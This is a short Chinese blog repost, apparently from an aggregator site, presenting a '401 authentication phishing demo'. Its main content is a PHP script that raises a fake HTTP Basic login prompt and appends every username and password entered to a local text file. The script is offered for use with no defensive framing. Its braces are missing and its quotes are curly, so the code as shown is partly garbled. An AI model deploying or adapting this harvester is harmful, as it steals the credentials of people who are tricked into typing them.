401认证钓鱼demo

Posted 2022-10-28 m0rta1s

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了401认证钓鱼demo相关的知识，希望对你有一定的参考价值。

<?php
//@b4dboy
if(!isset($_SERVER[‘PHP_AUTH_USER‘]) && !isset($_SERVER[‘PHP_AUTH_PW‘])) 
    Header("WWW-Authenticate: Basic realm=\"USER LOGIN\"");
    Header("HTTP/1.0 401 Unauthorized");
 else 
    @file_put_contents(‘./b4dboy.txt‘, $_SERVER[‘PHP_AUTH_USER‘].‘|‘.$_SERVER[‘PHP_AUTH_PW‘]."\r\n", FILE_APPEND);
    //xxx


    ?>

以上是关于401认证钓鱼demo的主要内容，如果未能解决你的问题，请参考以下文章

若依报错401，请求访问：认证失败，无法访问系统资源

HTTP响应码403 Forbidden和401 Unauthorized对比

西北工业大学遭黑客攻击？双因素认证改变局面！

Laravel Passport使用Axios 401未认证的API消耗自己的API.

在安装Openstack的keystone认证服务时，出现The request you have made requires authentication. (HTTP 401) (Request-

xss钓鱼，键盘记录